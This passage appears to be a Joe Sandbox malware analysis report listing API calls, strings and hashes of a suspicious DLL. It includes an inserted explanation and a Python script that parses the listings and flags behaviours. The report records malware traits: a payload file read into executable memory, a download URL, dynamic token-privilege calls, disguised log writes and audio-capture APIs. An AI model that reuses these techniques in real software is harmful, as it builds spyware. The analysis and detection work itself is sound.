                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: D@2@@std@@D@std@@FileMessageU?$char_traits@V?$allocator@$#825CloseHandleVirtual$?assign@?$basic_string@AllocCreateEos@?$basic_string@FreeGrow@?$basic_string@ReadSizeSleepV12@_access
                                                          • String ID: C:\Users\Public\Documents\MM\7.txt$https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt$runas
                                                          • API String ID: 1859234541-2290419671
                                                          • Opcode ID: c5a9ce1c4aaa493cda920053318a96be974c375f583f32f6d80e8228b9abdc2e
                                                          • Instruction ID: 85d187001e9454c1b90a95d0aec33d3ebb7e4a2eafac0ed4a4c13b68bd4555e4
                                                          • Opcode Fuzzy Hash: c5a9ce1c4aaa493cda920053318a96be974c375f583f32f6d80e8228b9abdc2e
                                                          • Instruction Fuzzy Hash: 30611638A04654ABD714CBA8EC89BDEBBB4FF29710F540229F909B72C0CB745A44CB64
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,FreeLibrary,?,L$_RasDefaultCredentials#0,00000000), ref: 1000532C
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005335
                                                          • LoadLibraryA.KERNEL32 ref: 10005386
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005389
                                                          • LoadLibraryA.KERNEL32(?,IsValidSid), ref: 10005397
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1000539A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: .23$2$3$ConvertSidToStringSidA$D$FreeLibrary$I$IsValidSid$L$_RasDefaultCredentials#0$LookupAccountNameA$P$V$kernel32.dll
                                                          • API String ID: 2574300362-2447002180
                                                          • Opcode ID: 0e49161b9a27eb155e0ea2c7e22d683dee310b1aad9c37f06d238c71156bed93
                                                          • Instruction ID: 223027d79037198c63e6ca2b5f055af27ccc184e3b8335a544396f1f5ed8738e
                                                          • Opcode Fuzzy Hash: 0e49161b9a27eb155e0ea2c7e22d683dee310b1aad9c37f06d238c71156bed93
                                                          • Instruction Fuzzy Hash: D631A472108385AED300DB68DC44AEFBFD8EFD5255F440A5EF58482241D7A9D60C8BB3
                                                          APIs
                                                          • #354.MFC42(?,0000000C,?,?,?,?,?,?,00000000), ref: 10008140
                                                          • #5186.MFC42 ref: 1000815A
                                                          • #665.MFC42 ref: 1000816F
                                                          • #540.MFC42(?), ref: 1000818F
                                                          • #537.MFC42(?,?), ref: 1000819E
                                                          • #4204.MFC42(?,?), ref: 100081DA
                                                          • #2915.MFC42(00000080,?,?), ref: 100081EA
                                                          • #5442.MFC42(00000000,?,00000080,?,?), ref: 10008231
                                                          • #5572.MFC42(00000000,00000000,?,00000080,?,?), ref: 10008240
                                                          • #6874.MFC42(00000000,00000000,00000000,?,00000080,?,?), ref: 1000824B
                                                          • #4204.MFC42(00000000,00000000,00000000,?,00000080,?,?), ref: 10008254
                                                          • #2764.MFC42(00000000,00000000,00000000,00000000,?,00000080,?,?), ref: 10008262
                                                          • MessageBoxA.USER32(00000000,100FA624,warning,00000000), ref: 100082AA
                                                          • #1979.MFC42(00000000,?,0000000C,?,?,?,?,?,?,00000000), ref: 100082C2
                                                          • #800.MFC42 ref: 100082D0
                                                          • #800.MFC42 ref: 100082DE
                                                          • #665.MFC42 ref: 100082EF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #4204#665#800$#1979#2764#2915#354#5186#537#540#5442#5572#6874Message
                                                          • String ID: $warning
                                                          • API String ID: 2155908909-2294955047
                                                          • Opcode ID: 6067239a1790e2aaed7541fadd4d3c9716379e727bc193a2b9c93e17d5900de7
                                                          • Instruction ID: 9dc4441f8a4d83bc09c7214041b265d206f9ed4755861ec79b83bd27d9149c0a
                                                          • Opcode Fuzzy Hash: 6067239a1790e2aaed7541fadd4d3c9716379e727bc193a2b9c93e17d5900de7
                                                          • Instruction Fuzzy Hash: 3251E0751087459BD348DF64D991B9BB7E1FF94710F800A2DF99693285DB30AE08CB92
                                                          APIs
                                                          • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000,1011EF78,00000000,0000005C), ref: 1001E484
                                                          • GetLocalTime.KERNEL32(?), ref: 1001E4CE
                                                          • sprintf.MSVCRT ref: 1001E599
                                                          • WriteFile.KERNEL32 ref: 1001E5EE
                                                          • CloseHandle.KERNEL32(00000000), ref: 1001E5F5
                                                            • Part of subcall function 10014CA0: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCrkat,?,00000000,0000002E,00000001), ref: 10014D10
                                                            • Part of subcall function 10014CA0: GetProcAddress.KERNEL32(00000000), ref: 10014D19
                                                            • Part of subcall function 10014CA0: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA), ref: 10014D27
                                                            • Part of subcall function 10014CA0: GetProcAddress.KERNEL32(00000000), ref: 10014D2A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressFileLibraryLoadProc$CloseCreateHandleLocalTimeWritesprintf
                                                          • String ID: $-$4$:$C:\ProgramData\Microsoft Drive\Mark.sys$M$T$TGByte\Setup$a$e$i$k$m$r
                                                          • API String ID: 694383593-1605913938
                                                          • Opcode ID: 4c6f48adef6daa44b2b0ac35a89abe2d34b5999bce17d81d3022533f6912276b
                                                          • Instruction ID: ffd3003c005704ab7e67b100a79d7c0ca88369faaa740befe4b72d95f5daddc9
                                                          • Opcode Fuzzy Hash: 4c6f48adef6daa44b2b0ac35a89abe2d34b5999bce17d81d3022533f6912276b
                                                          • Instruction Fuzzy Hash: BB516F7110D3C09EE311CB28C844B9BBFD5ABEA308F484A5DF5D967292C6B59608CB67
                                                          APIs
                                                            • Part of subcall function 10007940: #541.MFC42(?,?,?,10097D2B,000000FF), ref: 10007960
                                                            • Part of subcall function 10007940: #540.MFC42(?,?,?,10097D2B,000000FF), ref: 10007970
                                                          • #540.MFC42(?,?,00000000,00000065), ref: 10009F4E
                                                          • #540.MFC42 ref: 10009F5F
                                                          • #540.MFC42 ref: 10009F70
                                                          • #2614.MFC42 ref: 10009F81
                                                          • #860.MFC42(*.*), ref: 10009F8F
                                                          • #3811.MFC42(?,*.*), ref: 10009FB5
                                                          • #3811.MFC42(?,?,*.*), ref: 10009FC5
                                                          • #3811.MFC42(?,?,?,*.*), ref: 10009FD5
                                                          • #3811.MFC42(?,?,?,?,*.*), ref: 10009FE5
                                                          • #3811.MFC42(?,?,?,?,?,*.*), ref: 10009FF5
                                                          • #3811.MFC42(?,?,?,?,?,?,*.*), ref: 1000A005
                                                          • #860.MFC42(?,?,?,?,?,?,?,*.*), ref: 1000A033
                                                          • #2818.MFC42(?,*%s*,?,?,?,?,?,?,?,?,*.*), ref: 1000A04A
                                                          • #860.MFC42(?,?,00000000,00000065), ref: 1000A097
                                                          • #800.MFC42 ref: 1000A0D2
                                                          • #800.MFC42 ref: 1000A0E3
                                                          • #800.MFC42 ref: 1000A0F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #3811$#540$#800#860$#2614#2818#541
                                                          • String ID: *%s*$*.*
                                                          • API String ID: 185796673-1558234275
                                                          • Opcode ID: 6abb6b1f1cb9d99256978181ee2c38739354c8b016ba86206848d68570f9c942
                                                          • Instruction ID: ee2751bb99efb5b8e8624e7515bc667b61434bbdc0d3475f74e87a486019deaf
                                                          • Opcode Fuzzy Hash: 6abb6b1f1cb9d99256978181ee2c38739354c8b016ba86206848d68570f9c942
                                                          • Instruction Fuzzy Hash: 9B5146754083858FC325CFA4C591AABFBE5FFD9700F840A2DB59983292DB74A508CB63
                                                          APIs
                                                          • LoadLibraryA.KERNEL32 ref: 1002C6B7
                                                          • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 1002C6C7
                                                          • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 1002C6D1
                                                          • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 1002C6DD
                                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 1002C6E8
                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 1002C6F4
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 1002C750
                                                          • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 1002C758
                                                          • CloseHandle.KERNEL32(?), ref: 1002C76A
                                                          • FreeLibrary.KERNEL32(00000000), ref: 1002C77B
                                                          • FreeLibrary.KERNEL32(?), ref: 1002C786
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryProc$Load$Free$CloseHandle
                                                          • String ID: ADVAPI32.dll$AdjustTokenPrivileges$GetCurrentProcess$GetLastError$KERNEL32.dll$LookupPrivilegeValueA$OpenProcessToken$kernel32.dll
                                                          • API String ID: 2887716753-1648388921
                                                          • Opcode ID: a9b1a1682a1b70ae1ef51fcbf924e7be34b8c50650f9f94d2b2d5d74c0dc6493
                                                          • Instruction ID: 33c0dc777f036f73bb5b44afb239a268085fd6c5c3ab1e2ae988e7c16613607e
                                                          • Opcode Fuzzy Hash: a9b1a1682a1b70ae1ef51fcbf924e7be34b8c50650f9f94d2b2d5d74c0dc6493
                                                          • Instruction Fuzzy Hash: 3321A2716083046BD300EB75DC84FAFBBE8EFC8654F444A1DF544A3140DB78DA448B62
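The function entries above are the ones a triage analyst mines first: the loader at 10021301-10021394 opens C:\Users\Public\Documents\MM\7.txt for GENERIC_READ (0x80000000), allocates with VirtualAlloc flProtect 0x40 (PAGE_EXECUTE_READWRITE) and reads the file straight into that region; the writer at 1001E484-1001E5F5 combines GetLocalTime, sprintf and WriteFile with the string C:\ProgramData\Microsoft Drive\Mark.sys; and the routine at 1002C6B7-1002C786 resolves OpenProcessToken, AdjustTokenPrivileges and LookupPrivilegeValueA through LoadLibraryA/GetProcAddress rather than the import table. The Python below is an added example, not code from Joe Sandbox or from the sample: it parses entries written in this page's own listing format ("Name.MODULE(args), ref: addr", "Part of subcall function ..." prefixes, and the '$'-separated "String ID:" line) into per-function records, extracts drive-letter paths and URLs from both call arguments and String IDs, and applies three behaviour rules. The rule names, the constructed SAMPLE excerpt (copied from entries on this page) and the decision to key the RWX rule on the fourth VirtualAlloc argument are this example's assumptions.

```python
"""Parse Joe Sandbox per-function API entries (format as on this page) and flag behaviours.
Added example; not Joe Sandbox code. Rule names and sample excerpt are this example's own."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# "Name.MODULE(arg,arg), ref: 1000206D" or "Name.MODULE ref: 10005386",
# optionally prefixed with "Part of subcall function XXXXXXXX: ".
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>.+?)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
HEX_ARG = re.compile(r"^[0-9A-Fa-f]{8}$")                   # numeric argument as the report prints it
URL_OR_PATH = re.compile(r"^(?:https?://\S+|[A-Za-z]:\\.+)$")
PAGE_EXECUTE_READWRITE = 0x40                               # VirtualAlloc flProtect seen at 10021358
TOKEN_APIS = {"OpenProcessToken", "AdjustTokenPrivileges", "LookupPrivilegeValueA"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]                 # raw arguments; "?" means unknown to the sandbox
    ref: int                        # call-site address
    subcall: Optional[int] = None   # set when the entry came from "Part of subcall function"


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if not m:
        return None
    args = m["args"].split(",") if m["args"] else []
    sub = int(m["sub"], 16) if m["sub"] else None
    return ApiCall(m["name"], m["module"], args, int(m["ref"], 16), sub)


def parse_report(text: str) -> List[FunctionRecord]:
    """One record per "APIs" header; the String ID line is split on '$' as the report does."""
    records: List[FunctionRecord] = []
    current = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
        elif current is None:
            continue
        elif line.startswith("String ID:"):
            current.strings += [s.strip() for s in line[len("String ID:"):].split("$") if s.strip()]
        else:
            call = parse_api_line(line)
            if call:
                current.calls.append(call)
    return records


def extract_iocs(records: List[FunctionRecord]) -> List[str]:
    """Drive-letter paths and URLs, whether they appear as arguments or as String IDs."""
    found = set()
    for rec in records:
        found.update(a for c in rec.calls for a in c.args if URL_OR_PATH.match(a))
        found.update(s for s in rec.strings if URL_OR_PATH.match(s))
    return sorted(found)


def triage(rec: FunctionRecord) -> List[str]:
    """Behaviour flags for one function (rule names are this example's choice)."""
    flags = []
    names = {c.name for c in rec.calls}
    rwx = any(c.name == "VirtualAlloc" and len(c.args) == 4 and HEX_ARG.match(c.args[3])
              and int(c.args[3], 16) == PAGE_EXECUTE_READWRITE for c in rec.calls)
    if rwx:
        flags.append("rwx-allocation")
        if {"CreateFileA", "ReadFile"} <= names:
            flags.append("file-read-into-rwx-memory")    # on-disk payload staged for execution
    resolved = {a for c in rec.calls if c.name in ("LoadLibraryA", "GetProcAddress")
                for a in c.args if a != "?" and not HEX_ARG.match(a)}
    if TOKEN_APIS <= resolved:
        flags.append("dynamic-token-privilege-apis")     # import hidden from static import parsers
    if {"GetLocalTime", "WriteFile"} <= names:
        flags.append("timestamped-file-write")           # log-style output (keylog, harvested data)
    return flags


# Constructed excerpt: entries copied from three function records on this page.
SAMPLE = r"""
APIs
• CreateFileA.KERNEL32(C:\Users\Public\Documents\MM\7.txt,80000000,00000001,00000000,00000003,00000080,00000000), ref: 10021301
• VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 10021358
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10021384
• String ID: C:\Users\Public\Documents\MM\7.txt$https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt$runas
APIs
• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000,1011EF78,00000000,0000005C), ref: 1001E484
• GetLocalTime.KERNEL32(?), ref: 1001E4CE
• sprintf.MSVCRT ref: 1001E599
• WriteFile.KERNEL32 ref: 1001E5EE
  • Part of subcall function 10014CA0: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA), ref: 10014D27
• String ID: $-$4$:$C:\ProgramData\Microsoft Drive\Mark.sys$M$T$TGByte\Setup
APIs
• LoadLibraryA.KERNEL32 ref: 1002C6B7
• GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 1002C6C7
• GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 1002C6D1
• GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 1002C6DD
"""

if __name__ == "__main__":
    recs = parse_report(SAMPLE)
    for rec in recs:
        print(f"{rec.calls[0].ref:08X}: {', '.join(triage(rec)) or 'nothing flagged'}")
    print("IOCs:", *extract_iocs(recs), sep="\n  ")
```

Run it as a script to see one line per function with its flags and the combined indicator list; feed it the whole report text instead of SAMPLE to cover every function entry. The RWX rule deliberately keys on the flProtect value rather than on VirtualAlloc alone, since RW allocations are routine; the token rule keys on the three names resolved together, because each one alone is common in benign code.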
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,SetEvent), ref: 10001329
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10001332
                                                          • LoadLibraryA.KERNEL32 ref: 100013A4
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100013A7
                                                            • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(KERNEL32.dll,ResumeThread,00000000,?,00000000,771AF550), ref: 100015B9
                                                            • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 100015C2
                                                            • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(KERNEL32.dll,CreateThread,?,00000000,771AF550), ref: 100015D2
                                                            • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 100015D5
                                                            • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(WINMM.dll,waveInOpen,?,00000000,771AF550), ref: 100015E5
                                                            • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 100015E8
                                                            • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(WINMM.dll,waveInGetNumDevs,?,00000000,771AF550), ref: 100015F8
                                                            • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 100015FB
                                                            • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(WINMM.dll,waveInPrepareHeader,?,00000000,771AF550), ref: 10001609
                                                            • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 1000160C
                                                            • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(WINMM.dll,waveInAddBuffer,?,00000000,771AF550), ref: 1000161C
                                                            • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 1000161F
                                                            • Part of subcall function 100015A0: LoadLibraryA.KERNEL32(WINMM.dll,waveInStart,?,00000000,771AF550), ref: 1000162F
                                                            • Part of subcall function 100015A0: GetProcAddress.KERNEL32(00000000), ref: 10001632
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: F$KERNEL32.dll$O$S$SetEvent$W$a$b$c$g$j$l$n$o$r
                                                          • API String ID: 2574300362-1789360232
                                                          • Opcode ID: 8681ca1b1b33f73bda7f61c2a29eb6732c7a1b4a0c27a5eda15d591767e8de8a
                                                          • Instruction ID: 6d0500b828a3b4bacedf277e9e204f21e6ad90e68e93e0fee001a8a00f1ea147
                                                          • Opcode Fuzzy Hash: 8681ca1b1b33f73bda7f61c2a29eb6732c7a1b4a0c27a5eda15d591767e8de8a
                                                          • Instruction Fuzzy Hash: 7531C26110C3C08ED301DA6D9840B9BFFD59FA6658F090A9EE5C857343C6AAD61CC7BB
                                                          APIs
                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000,00000001,00000001), ref: 1000724A
                                                          • LocalAlloc.KERNEL32(00000040,00000400), ref: 100072B9
                                                          • GetFileAttributesA.KERNEL32(?), ref: 100072C9
                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 100072F2
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 10007301
                                                          • malloc.MSVCRT ref: 1000730E
                                                          • ReadFile.KERNEL32(?,00000000,?,0000023D,00000000), ref: 10007335
                                                          • CloseHandle.KERNEL32(?), ref: 10007342
                                                          • free.MSVCRT ref: 10007378
                                                          • lstrlenA.KERNEL32(?), ref: 100073F9
                                                          • lstrlenA.KERNEL32(?), ref: 10007418
                                                          • lstrlenA.KERNEL32(?), ref: 10007427
                                                          • lstrlenA.KERNEL32(?), ref: 10007449
                                                          • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 10007457
                                                          • lstrlenA.KERNEL32(?), ref: 10007476
                                                          • lstrlenA.KERNEL32(?), ref: 10007493
                                                          • LocalReAlloc.KERNEL32(00000000,-00000002,00000042), ref: 100074A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$File$AllocLocal$AttributesCloseCreateFolderHandlePathReadSizeSpecialfreemalloc
                                                          • String ID: Version
                                                          • API String ID: 2101459175-1889659487
                                                          • Opcode ID: 6a0b98066b5d49aaa321f8aac068bd95de7a0d5d57adc8d2d75a6c02baa70be5
                                                          • Instruction ID: 769e996927bfc21683bf280013aeb7311bfd231a2bd5de20caf2ac03464e0c1e
                                                          • Opcode Fuzzy Hash: 6a0b98066b5d49aaa321f8aac068bd95de7a0d5d57adc8d2d75a6c02baa70be5
                                                          • Instruction Fuzzy Hash: 2E61C8756002045BE728DB78CC99BEB3795FB88310F54472DFE1ADB2D5DB78AA04C660
                                                          APIs
                                                          • #2614.MFC42(00000000,?), ref: 100110F5
                                                          • #2614.MFC42(00000000,?), ref: 100110FD
                                                          • #6143.MFC42(00000000,000000FF,00000000,?), ref: 10011110
                                                          • #2614.MFC42(00000000,000000FF,00000000,?), ref: 1001111C
                                                            • Part of subcall function 10012190: #825.MFC42(?,00000000,?,?,?,1001112D,00000000,000000FF,00000000,000000FF,00000000,?), ref: 100121D1
                                                          • #860.MFC42(?,00000000,000000FF,00000000,000000FF,00000000,?), ref: 10011137
                                                          • PathGetArgsA.SHLWAPI(00000000,?), ref: 10011172
                                                          • #860.MFC42(00000000), ref: 1001117C
                                                          • PathRemoveArgsA.SHLWAPI(00000000), ref: 10011186
